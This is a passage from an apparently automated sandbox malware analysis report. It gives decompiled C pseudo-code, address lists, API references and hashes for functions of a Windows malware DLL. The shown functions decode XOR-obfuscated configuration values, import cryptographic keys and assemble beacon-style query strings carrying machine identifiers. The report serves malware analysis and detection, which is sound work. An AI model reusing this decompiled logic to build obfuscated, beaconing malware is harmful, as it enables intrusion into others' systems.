					}
					goto L15;
				}
			}























                                0x04612bee
                                0x04612bf1
                                0x04612bfa
                                0x04612bfd
                                0x04612c00
                                0x04612c03
                                0x04612cff
                                0x04612d03
                                0x04612c15
                                0x04612c21
                                0x04612c28
                                0x04612c2f
                                0x00000000
                                0x00000000
                                0x04612c35
                                0x04612c3d
                                0x00000000
                                0x00000000
                                0x04612c43
                                0x04612c4c
                                0x04612c50
                                0x00000000
                                0x00000000
                                0x04612c52
                                0x04612c59
                                0x04612c5e
                                0x04612c60
                                0x04612c63
                                0x04612ce4
                                0x04612ceb
                                0x04612ced
                                0x00000000
                                0x00000000
                                0x04612cef
                                0x04612cf3
                                0x04612cf8
                                0x04612cf8
                                0x00000000
                                0x04612cf3
                                0x04612c6a
                                0x04612c72
                                0x04612c72
                                0x04612c7b
                                0x04612c89
                                0x04612ce0
                                0x04612ce0
                                0x00000000
                                0x04612cac
                                0x04612caf
                                0x00000000
                                0x04612caf
                                0x04612c89
                                0x04612cbe
                                0x04612ccc
                                0x04612cd1
                                0x04612cd3
                                0x04612ce8
                                0x00000000
                                0x04612ce8
                                0x04612cd5
                                0x04612cdb
                                0x04612cde
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04612cde

                                APIs
                                • memcpy.NTDLL(00000000,?,?,?,?,046120FA,?,046120FA,?,046120FA), ref: 04612C6A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: 4d2eb9597a1ab46a18a08e0d178d681fe764c990d14e00972b6c31e9554b8d78
                                • Instruction ID: 3bb1f6f65487b6920ed075abf2a86cb1627077482a34ff6d2a67f5176aa258c7
                                • Opcode Fuzzy Hash: 4d2eb9597a1ab46a18a08e0d178d681fe764c990d14e00972b6c31e9554b8d78
                                • Instruction Fuzzy Hash: 84316FB5A00159EFDF61DFA5CC90BAEB778BB14304F1840E9E615B3260F630AA84DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04615384, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04615384(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E04616A36(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x461a290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E04614576(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                                0x04615384
                                0x0461538c
                                0x046153a3
                                0x046153be
                                0x046153c2
                                0x046153c7
                                0x046153c9
                                0x046153d9
                                0x046153e5
                                0x046153cb
                                0x046153cb
                                0x046153ce
                                0x046153d3
                                0x046153d3
                                0x046153c9
                                0x046153eb
                                0x046153ef
                                0x046153ef
                                0x04615398
                                0x0461539d
                                0x046153a1
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 04614576: SysFreeString.OLEAUT32(00000000), ref: 046145DC
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7519F710,?,00000000,?,00000000,?,04611AF5,?,004F0053,053C9308,00000000,?), ref: 046153E5
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Free$HeapString
                                • String ID:
                                • API String ID: 3806048269-0
                                • Opcode ID: f5275df62ad06e3a6099e954ba46cb7fd6f78c16c22ca0afea1872034935e987
                                • Instruction ID: cd342c1b69d7c652fe7f8996bff4859105c25c2f906d7b5578b23e3a148f8893
                                • Opcode Fuzzy Hash: f5275df62ad06e3a6099e954ba46cb7fd6f78c16c22ca0afea1872034935e987
                                • Instruction Fuzzy Hash: EA01E832101659BBCB229F44CC51EAA7BA5EB54791F888029FE065A270F771E960DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046149FE, Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
                                			E046149FE(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E046139C5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E04616837(_a8 + _a8);
					if(_t21 != 0) {
						E04612E61(_a4, _t21, _t23);
					}
					E046150CA(_a4);
				}
				return _t21;
			}





                                0x04614a06
                                0x04614a0d
                                0x04614a0f
                                0x04614a1e
                                0x04614a25
                                0x04614a34
                                0x04614a38
                                0x04614a3f
                                0x04614a3f
                                0x04614a47
                                0x04614a4c
                                0x04614a51

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,046170D9,00000000,?,046162B1,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 04614A0F
                                  • Part of subcall function 046139C5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04614A23,00000001,046170D9,00000000), ref: 046139FD
                                  • Part of subcall function 046139C5: memcpy.NTDLL(04614A23,046170D9,00000010,?,?,?,04614A23,00000001,046170D9,00000000,?,046162B1,00000000,046170D9,?,00000000), ref: 04613A16
                                  • Part of subcall function 046139C5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04613A3F
                                  • Part of subcall function 046139C5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04613A57
                                  • Part of subcall function 046139C5: memcpy.NTDLL(00000000,00000000,053C9630,00000010), ref: 04613AA9
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                • String ID:
                                • API String ID: 894908221-0
                                • Opcode ID: 4a069c444d42b0fbb0e3d24cc4b7f67e065049c9cf56e66aab4247af1eaaddae
                                • Instruction ID: eba4e59b33c71efebad0a673e7b28b5e31191e3ba28b29d3c83fa8f2890c55cc
                                • Opcode Fuzzy Hash: 4a069c444d42b0fbb0e3d24cc4b7f67e065049c9cf56e66aab4247af1eaaddae
                                • Instruction Fuzzy Hash: F6F03076100108BADF11AE55DC40DEF3F6DEF85354B098026FD098B124EA31E555D7A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04611FC2, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E04611FC2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                0x04611fc2
                                0x04611fcf
                                0x04611fd0
                                0x04611fd1
                                0x04611fd8
                                0x04612006
                                0x04612007
                                0x0461200a
                                0x04612010
                                0x00000000
                                0x00000000
                                0x04611fef
                                0x04611ff9
                                0x04612000
                                0x00000000
                                0x04611ff1
                                0x04611ff4
                                0x04612014
                                0x04611ff6
                                0x04611ff6
                                0x00000000
                                0x04611ff6
                                0x04611ff4
                                0x0461201b
                                0x04612021
                                0x04612021
                                0x00000000

                                APIs
                                • Sleep.KERNELBASE(000001F4), ref: 0461200A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: f309d05eac32f3f665050ddab9c713f0d67e14e210130a3386c7de0be0d4c825
                                • Instruction ID: 99735c1218fedc6d04e70f2676b7f4fdc49f8fc355069f3e59f8d84fa2853590
                                • Opcode Fuzzy Hash: f309d05eac32f3f665050ddab9c713f0d67e14e210130a3386c7de0be0d4c825
                                • Instruction Fuzzy Hash: FAF03C71D01218EFDB00DFD4C498AEDB7B8FF05345F1840AAE502A3210E3B46B84DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04611F7A, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04611F7A(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E04611A15(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E046117B0(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                0x04611f82
                                0x04611f9c
                                0x00000000
                                0x04611fb8
                                0x04611f93
                                0x04611f9a
                                0x00000000
                                0x00000000
                                0x04611fbf

                                APIs
                                • lstrlenW.KERNEL32(?,?,?,04611F20,3D046190,80000002,046130C2,04614106,74666F53,4D4C4B48,04614106,?,3D046190,80000002,046130C2,?), ref: 04611F9F
                                  • Part of subcall function 046117B0: SysAllocString.OLEAUT32(04614106), ref: 046117CA
                                  • Part of subcall function 046117B0: SysFreeString.OLEAUT32(00000000), ref: 0461180A
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFreelstrlen
                                • String ID:
                                • API String ID: 3808004451-0
                                • Opcode ID: e9fdb49e6cbe87d2d61cd1b70c55ece28fe9619ef427e207712b2cc89a091678
                                • Instruction ID: adc0cc5bb568f00ac5b0935f4308248d0a7a0328ba490dfdd0f436c0d13ade23
                                • Opcode Fuzzy Hash: e9fdb49e6cbe87d2d61cd1b70c55ece28fe9619ef427e207712b2cc89a091678
                                • Instruction Fuzzy Hash: F1F01F3200420EBFDF169F90DC05EEA3F6AAB19354F088119BA1455171E772E5B1EBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0461738C, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0461738C(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E0461181D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E046150CA(_a4);
				}
				return _t12;
			}





                                0x04617398
                                0x0461739d
                                0x046173a1
                                0x046173a8
                                0x046173b3
                                0x046173b7
                                0x046173b7
                                0x046173c0

                                APIs
                                  • Part of subcall function 0461181D: memcpy.NTDLL(00000000,00000110,046120FA,046120FA,?,?,046120FA,?,?,04616042,?), ref: 04611853
                                  • Part of subcall function 0461181D: memset.NTDLL ref: 046118C8
                                  • Part of subcall function 0461181D: memset.NTDLL ref: 046118DC
                                • memcpy.NTDLL(046120FA,046120FA,00000000,046120FA,046120FA,046120FA,?,?,04616042,?,?,046120FA,?), ref: 046173A8
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpymemset$FreeHeap
                                • String ID:
                                • API String ID: 3053036209-0
                                • Opcode ID: 0e6eeedcb255031fa5e404f471041d1cea96e9d7798315364b05c0ee56672632
                                • Instruction ID: 4baf4bf63ee1a5b45a1b7f84bd2f34a528f58798571006620beb086b45bd334d
                                • Opcode Fuzzy Hash: 0e6eeedcb255031fa5e404f471041d1cea96e9d7798315364b05c0ee56672632
                                • Instruction Fuzzy Hash: 7AE0867740011877DB123AD4DC00DEF7F6CCF56691F088029FE0846210F622E55097F5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 04612206, Relevance: 10.7, APIs: 7, Instructions: 204memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 94%
                                			E04612206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0x461a2d0; // 0x63699bc3
				if(E04611BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0x461a324 = _v8;
				}
				_t31 =  *0x461a2d0; // 0x63699bc3
				if(E04611BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0x461a2d0; // 0x63699bc3
				if(E04611BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0x461a290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0x461a2d0; // 0x63699bc3
						_t43 = E046138CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x461a298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0x461a2d0; // 0x63699bc3
						_t44 = E046138CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x461a29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0x461a2d0; // 0x63699bc3
						_t45 = E046138CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x461a2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0x461a2d0; // 0x63699bc3
						_t46 = E046138CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x461a004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0x461a2d0; // 0x63699bc3
						_t47 = E046138CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x461a02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0x461a2d0; // 0x63699bc3
						_t48 = E046138CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E04613E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E046150DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0x461a2d0; // 0x63699bc3
						_t49 = E046138CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E04613E49(0, _t49) != 0) {
						_t102 =  *0x461a37c; // 0x53c9630
						E046110DD(_t102 + 4, _t54);
					}
					_t50 =  *0x461a2d4; // 0xdad5a8
					_t20 = _t50 + 0x461b252; // 0x53c87fa
					_t21 = _t50 + 0x461b7b5; // 0x6976612e
					 *0x461a320 = _t20;
					 *0x461a390 = _t21;
					HeapFree( *0x461a290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}





























                                0x04612206
                                0x04612209
                                0x04612229
                                0x04612237
                                0x04612237
                                0x0461223c
                                0x04612256
                                0x0461242a
                                0x04612431
                                0x04612438
                                0x04612438
                                0x0461225c
                                0x04612278
                                0x04612418
                                0x04612422
                                0x00000000
                                0x0461227e
                                0x0461227e
                                0x04612283
                                0x04612299
                                0x04612285
                                0x04612285
                                0x04612292
                                0x04612292
                                0x046122a3
                                0x046122a5
                                0x046122af
                                0x046122b4
                                0x046122b4
                                0x046122af
                                0x046122bb
                                0x046122d1
                                0x046122bd
                                0x046122bd
                                0x046122ca
                                0x046122ca
                                0x046122d5
                                0x046122d7
                                0x046122e1
                                0x046122e6
                                0x046122e6
                                0x046122e1
                                0x046122ed
                                0x04612303
                                0x046122ef
                                0x046122ef
                                0x046122fc
                                0x046122fc
                                0x04612307
                                0x04612309
                                0x04612313
                                0x04612318
                                0x04612318
                                0x04612313
                                0x0461231f
                                0x04612335
                                0x04612321
                                0x04612321
                                0x0461232e
                                0x0461232e
                                0x04612339
                                0x0461233b
                                0x04612345
                                0x0461234a
                                0x0461234a
                                0x04612345
                                0x04612351
                                0x04612367
                                0x04612353
                                0x04612353
                                0x04612360
                                0x04612360
                                0x0461236b
                                0x0461236d
                                0x04612377
                                0x0461237c
                                0x0461237c
                                0x04612377
                                0x04612383
                                0x04612399
                                0x04612385
                                0x04612385
                                0x04612392
                                0x04612392
                                0x0461239d
                                0x0461239f
                                0x046123a2
                                0x046123a3
                                0x046123aa
                                0x046123ac
                                0x046123ad
                                0x046123ad
                                0x046123aa
                                0x046123b4
                                0x046123ca
                                0x046123b6
                                0x046123b6
                                0x046123c3
                                0x046123c3
                                0x046123ce
                                0x046123dc
                                0x046123e6
                                0x046123e6
                                0x046123eb
                                0x046123f1
                                0x046123fe
                                0x04612404
                                0x0461240a
                                0x0461240f
                                0x04612415
                                0x00000000
                                0x04612415

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,046155D3,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 046122AB
                                • StrToIntExA.SHLWAPI(00000000,00000000,046155D3,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 046122DD
                                • StrToIntExA.SHLWAPI(00000000,00000000,046155D3,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 0461230F
                                • StrToIntExA.SHLWAPI(00000000,00000000,046155D3,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 04612341
                                • StrToIntExA.SHLWAPI(00000000,00000000,046155D3,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 04612373
                                • HeapFree.KERNEL32(00000000,?,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 0461240F
                                • HeapFree.KERNEL32(00000000,?,?,046155D3,63699BC3,?,?,63699BC3,046155D3,?,63699BC3,E8FA7DD7,0461A00C,74ECC740), ref: 04612422
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 2803e4cdfb3596141c770329779d1e9acfc0751a08e5aa7fdeda1a17409acfcc
                                • Instruction ID: 1ecc9c3484300d780fec42e5b8f9939388aa04505d70b8a2446284103a0e95cb
                                • Opcode Fuzzy Hash: 2803e4cdfb3596141c770329779d1e9acfc0751a08e5aa7fdeda1a17409acfcc
                                • Instruction Fuzzy Hash: A8618F70B00114ABDB11DBF5D998C9F77B9EB48740B2C19AAA502E3270FA39FD41DB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04616EFC, Relevance: 34.7, APIs: 23, Instructions: 220memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 70%
                                			E04616EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x461a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x461a018; // 0x4934a3dd
					asm("bswap eax");
					_t32 =  *0x461a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x461a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x461a00c; // 0x69ab8210
					asm("bswap eax");
					_t35 =  *0x461a2d4; // 0xdad5a8
					_t2 = _t35 + 0x461b613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x461a02c,  *0x461a004, _t110);
					_t38 = E04616A09();
					_t39 =  *0x461a2d4; // 0xdad5a8
					_t3 = _t39 + 0x461b653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x461a2d4; // 0xdad5a8
						_t7 = _t92 + 0x461b65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E04615040(_t99);
					_t44 =  *0x461a2d4; // 0xdad5a8
					_t9 = _t44 + 0x461b302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x461a2d4; // 0xdad5a8
					_t11 = _t48 + 0x461b2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x461a32c; // 0x53c95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x461a2d4; // 0xdad5a8
						_t13 = _t88 + 0x461b676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x461a37c; // 0x53c9630
					_a28 = E04612885(0x461a00a, _t105 + 4);
					_t55 =  *0x461a31c; // 0x53c95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x461a2d4; // 0xdad5a8
						_t16 = _t84 + 0x461b8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x461a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x461a2d4; // 0xdad5a8
						_t18 = _t81 + 0x461b8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x461a290, _t107, 0x800);
						if(_t98 != _t107) {
							E04612DD0(GetTickCount());
							_t62 =  *0x461a37c; // 0x53c9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x461a37c; // 0x53c9630
							__imp__(_t66 + 0x40);
							_t68 =  *0x461a37c; // 0x53c9630
							_t115 = E0461624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x46192ac);
								_push(_t115);
								_t108 = E046121C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E04611032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E04611492();
									}
									HeapFree( *0x461a290, 0, _v24);
								}
								HeapFree( *0x461a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x461a290, _t107, _t98);
						}
						HeapFree( *0x461a290, _t107, _a20);
					}
					HeapFree( *0x461a290, _t107, _t117);
				}
				return _v16;
			}





















































                                0x04616efc
                                0x04616f10
                                0x04616f12
                                0x04616f20
                                0x04616f24
                                0x04616f2c
                                0x04616f34
                                0x04616f34
                                0x04616f36
                                0x04616f42
                                0x04616f51
                                0x04616f56
                                0x04616f59
                                0x04616f5e
                                0x04616f61
                                0x04616f66
                                0x04616f69
                                0x04616f75
                                0x04616f82
                                0x04616f84
                                0x04616f8a
                                0x04616f8f
                                0x04616f9a
                                0x04616f9c
                                0x04616f9f
                                0x04616fa5
                                0x04616fa7
                                0x04616fb0
                                0x04616fbb
                                0x04616fbd
                                0x04616fc0
                                0x04616fc0
                                0x04616fc2
                                0x04616fc9
                                0x04616fce
                                0x04616fdb
                                0x04616fdd
                                0x04616fe2
                                0x04616ff0
                                0x04616ff2
                                0x04616ff7
                                0x04616ffc
                                0x04616fff
                                0x04617004
                                0x0461700f
                                0x04617011
                                0x04617014
                                0x04617014
                                0x04617016
                                0x04617029
                                0x0461702d
                                0x04617032
                                0x04617036
                                0x04617039
                                0x0461703e
                                0x04617049
                                0x0461704b
                                0x0461704e
                                0x0461704e
                                0x04617050
                                0x04617057
                                0x0461705a
                                0x0461705f
                                0x04617069
                                0x0461706b
                                0x04617072
